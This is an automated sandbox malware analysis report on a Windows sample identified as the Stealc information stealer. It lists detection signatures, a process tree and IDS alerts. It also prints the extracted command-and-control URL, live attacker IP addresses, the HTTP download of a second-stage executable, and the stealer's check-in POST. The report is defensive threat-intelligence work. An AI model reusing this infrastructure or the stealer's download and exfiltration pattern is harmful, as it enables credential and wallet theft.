Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VAIIBIHmtT.exe

Overview

General Information

Sample name:VAIIBIHmtT.exe
renamed because original name is a hash value
Original sample name:35489d9dc0929e90b0b89b4f569df8c1.exe
Analysis ID:1542425
MD5:35489d9dc0929e90b0b89b4f569df8c1
SHA1:57010eda768b5bf82e306443f1df42f521bbad91
SHA256:53fe5c2231b5b1753668ef852cb61e233cc389fdf8a2ac6afe2028bdd9509df6
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • VAIIBIHmtT.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\VAIIBIHmtT.exe" MD5: 35489D9DC0929E90B0B89B4F569DF8C1)
    • VAIIBIHmtT.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\VAIIBIHmtT.exe" MD5: 35489D9DC0929E90B0B89B4F569DF8C1)
      • 81C9.tmp.exe (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe" MD5: E00B441455DC50083BB537C343EB1B99)
        • WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xf98:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.3.81C9.tmp.exe.b70000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
            2.3.81C9.tmp.exe.b70000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              2.2.81C9.tmp.exe.b20e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                2.2.81C9.tmp.exe.b20e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  2.2.81C9.tmp.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-25T22:37:15.321806+020020442431Malware Command and Control Activity Detected192.168.2.44973262.204.41.17780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-25T22:37:05.562686+020028032742Potentially Bad Traffic192.168.2.449730104.21.56.70443TCP
                    2024-10-25T22:37:06.688285+020028032742Potentially Bad Traffic192.168.2.449731176.113.115.3780TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: VAIIBIHmtT.exeAvira: detected
                    Found malware configuration
                    Source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeReversingLabs: Detection: 34%
                    Multi AV Scanner detection for submitted file
                    Source: VAIIBIHmtT.exeReversingLabs: Detection: 50%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: VAIIBIHmtT.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,2_2_0040C820
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00407240
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00409AC0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00418EA0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_00409B60
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B274A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00B274A7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B29DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_00B29DC7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B29D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00B29D27
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B39107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_00B39107
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,2_2_00B2CA87

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeUnpacked PE file: 1.2.VAIIBIHmtT.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeUnpacked PE file: 2.2.81C9.tmp.exe.400000.1.unpack
                    Source: VAIIBIHmtT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00B2DCE7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_00B2C0D7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B2E077
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B21937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B21937
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B2F917
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B34107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00B34107
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00B2E697
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B2EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_00B2EF87
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_00B347D7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B33B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_00B33B17
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00B34B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00B34B77
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004027D0 GetNumberFormatW,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,EnumTimeFormatsW,GetTempFileNameW,IsBadCodePtr,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus,0_2_004027D0

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.204.41.177:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 20:37:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 25 Oct 2024 20:30:02 GMTETag: "55e00-62552fbce3b10"Accept-Ranges: bytesContent-Length: 351744Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 f5 7d 5c 5d 94 13 0f 5d 94 13 0f 5d 94 13 0f e0 db 85 0f 5c 94 13 0f 43 c6 97 0f 41 94 13 0f 43 c6 86 0f 4c 94 13 0f 43 c6 90 0f 00 94 13 0f 7a 52 68 0f 5a 94 13 0f 5d 94 12 0f 21 94 13 0f 43 c6 99 0f 5c 94 13 0f 43 c6 87 0f 5c 94 13 0f 43 c6 82 0f 5c 94 13 0f 52 69 63 68 5d 94 13 0f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f6 49 df 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 70 03 00 00 aa 0f 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 b9 b7 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 98 03 00 50 00 00 00 00 b0 11 00 10 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 6f 03 00 00 10 00 00 00 70 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 22 00 00 00 80 03 00 00 24 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c f6 0d 00 00 b0 03 00 00 48 00 00 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 5d 14 00 00 b0 11 00 00 7e 01 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 42 41 42 38 35 39 32 31 38 32 33 33 38 31 35 39 31 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="hwid"B2BAB85921823381591466------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build"default9_cap------DAECFIJDAAAKECBFCGHI--
                    Source: Joe Sandbox ViewIP Address: 176.113.115.37 176.113.115.37
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00402A14
                    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 42 41 42 38 35 39 32 31 38 32 33 33 38 31 35 39 31 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; 